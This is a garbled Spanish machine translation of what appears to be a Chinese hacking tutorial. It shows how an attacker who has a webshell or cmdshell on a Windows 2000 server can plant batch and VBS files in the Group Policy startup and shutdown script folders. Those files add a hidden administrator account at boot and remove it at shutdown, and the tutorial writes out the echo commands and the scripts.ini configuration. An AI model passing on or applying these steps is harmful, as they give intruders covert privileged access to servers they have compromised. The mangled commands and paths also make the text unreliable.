Cómo omitir los derechos de administrador y cambiar la IP en el sistema 2000Aumentar los derechos de administrador: iniciar el método de secuencia de comandos. Has visto las 8 formas de aumentar los privilegios de administrador resumidas en "No soy yo [F.S.T.]". Ahora usamos scripts de inicio y procesamiento por lotes para aumentar los privilegios al obtener el shell. Método 9: ¡Inicie el método del script! ! El primer lote de filtraciones, todo el mundo debería observarlo con atención. Intento no hablar demasiado y mantener mis palabras concisas y directas. Nota: El script de inicio es un archivo por lotes que se ejecuta antes de invitar al usuario a iniciar sesión. Su función es similar al archivo por lotes de ejecución automática autoexec.bat en Win9X y DOS. Dado que el script se ejecuta antes de iniciar sesión en Windows, podemos modificar el contenido del script para configurar el sistema, como iniciar la puerta trasera, agregar una cuenta de administrador, modificar la cuenta de administrador, etc. No importa lo que pienses. Esto es mentira... Este artículo primero presenta cómo agregar una cuenta oculta a través de webshell (después de todo, esto es lo que más preocupa a todos :) y luego explica cómo resolver el problema una vez que ocurre. ¿Cómo agregar una cuenta? I. Si puedes escribir archivos directamente, como ocean. (1) Primero, usamos ocean para escribir un archivo por lotes espadas1.bat para el nuevo administrador, de la siguiente manera: usuario de red espadas $ Contenido $ nbspEVI octal/add administrador de grupo local neto espada $ Contenido $ nbsp/add será un archivo llamado La cuenta oculta y la contraseña eviloctal para espadas$ se agregan a este archivo por lotes. Guarde el archivo Swords1.bat en "c:\win nt\system32\group Policy\machine\scripts\startup". (Nota: c:\winnt es el directorio del sistema. Si el disco del sistema no es la unidad c, cámbielo al directorio del sistema correspondiente. Si ve esta computadora, es posible que no encuentre la carpeta Política de grupo\Computadora\Scripts\ Inicio Puede seleccionar Herramientas/Opciones de carpeta/Ver/Hacer clic para mostrar todos los archivos y carpetas. Si usa fso para mostrar todos los archivos en el océano, no es necesario hacer esto (2) A continuación, escriba un archivo por lotes. .bat para eliminar el miembro de administración, es muy simple y se puede completar en una oración, de la siguiente manera: Netizen Swords $ Contenido $ nbsp/del Este archivo por lotes elimina una cuenta oculta llamada Swords$ por el administrador y guarda el archivo. Swords2.bat en "C: \win nt\system32\group Policy\machine\scripts\shut down". (3) Escriba un archivo de configuración del script de inicio/apagado scripts.ini (nota: scripts es el nombre del archivo de configuración predeterminado, y ) de la siguiente manera: [inicio] 0 cmdline = espadas 1 . bat 0 parámetros =[apagar] 0 cmdline = espadas 2 . bat 0 parámetros =Guarde el archivo scripts.ini en C:\winnt\system32\ en GroupPolicy\Machine\. Scripts 2. Si con cmdshell, puede tener permisos de eco, entonces puede agregar: (1) echo, el archivo usado al iniciar espadas1.vbs, eco en caso de error, reanudar a continuación & gtc:\ win nt \ system32 \ group Policy \ Máquina \ Scripts \ Inicio \ espadas 1 . VBS echo net usuario espadas $ Contenido $ nbspEVI octal/add >& gtc:\ win nt \ system32 \ política de grupo \ Máquina \ Scripts \ Inicio \ espadas 1 . s espadas $ Contenido $ nbsp;/add >>c:\win nt\system32\group Policy\machine\scripts\startup\swords 1. VBS Nota: La primera línea debe ser '>De esta manera, se pueden eliminar los datos originales .
(2) echo, el archivo de script utilizado cuando se cierra espadas2.vbs, espadas de usuario de echo net $ Contenido $ nbsp/del & gt; C:\win nt\system32\group Policy\Machine\Scripts\shut down\swords 2. VBS (3) Escriba un archivo de configuración de secuencia de comandos de inicio/apagado Scripts. ini echo[Inicio]> C:\win nt\system32\group Policy\Machine\Scripts\Scripts.ini echo 0 cmdline = espadas 1. VBS>>c:\ win nt\system32\group Policy\Machine\Scripts\Scripts.ini echo 0 parámetros =>>c:\win nt\system32\group Policy\Machine\Scripts\Scripts.ini echo[apagado]> ;>c:\win nt\system32\group Policy\Machine\Scripts\Scripts.ini echo 0 cmdline = espadas 2.VBS>>c:\win nt\system32\group Policy\Machine\Scripts\Scripts.ini echo 0 parámetros = >>C:\ win nt\system32\group Policy\machine\scripts\scripts.ini Guarde el archivo scripts.ini en C:\win nt\system32\group Policy\machine\scripts. Finalmente, espere a que el servidor reinicie la computadora o fuerce su inicio por sí solo (hay muchas formas). Entonces espera y juega. Nota: Al utilizar este método, el servidor debe tener asignado un script de inicio de la computadora; de lo contrario, es posible que este método no tenga éxito. 3. ¿Qué sucede si usted es una computadora local o se ha conectado al 3389 de la otra parte, pero solo tiene derechos de usuario normal? Antes de iniciar el script de inicio/apagado de la computadora, se debe asignar. La asignación de secuencias de comandos de inicio/apagado de la computadora debe realizarse a través del complemento MMC (Consola de administración) de directiva de grupo: (1) Iniciar/Ejecutar/MMC, abra la consola de Microsoft (2) Presione ctrl+M para abrir el complemento Agregar o quitar -en la ventana y luego haga clic en Agregar. (3) Seleccione "Política de grupo" en el cuadro de diálogo "Agregar unidad de administración independiente" y haga clic en el botón "Agregar". (4) Seleccione el objeto de política de grupo predeterminado "Equipo local"/Finalizar/Aceptar/Aceptar para cerrar la ventana. (5) Abra el nodo Configuración de la computadora/Configuración de Windows/Script (Inicio/Apagado) en la política "Computadora local" generada, haga doble clic en el elemento "Inicio" o "Apagado", configure el script utilizado cuando la computadora se inicia o se apaga. hacia abajo y haga clic en Examinar. Agregue el archivo de secuencia de comandos que desea iniciar y confirme. (6) Una vez completada la configuración, guarde y salga de la unidad de administración MMC de política de grupo. Después de actualizar la Política de grupo, estos scripts entrarán en vigencia al iniciar y apagar la computadora. Nota: También puede abrir gpedit.msc directamente, expandir Configuración del equipo/Configuración de Windows/Scripts (Inicio/Apagar) y luego agregar el script de inicio. Luego expanda "Configuración del equipo/Plantillas administrativas/Sistema/Inicio de sesión" y habilite "Mostrar estado de ejecución del script de inicio". Eche un vistazo después de reiniciar, abra cmd, ingrese net user Swords$ para mostrar información detallada. Gaga, hay un usuario más.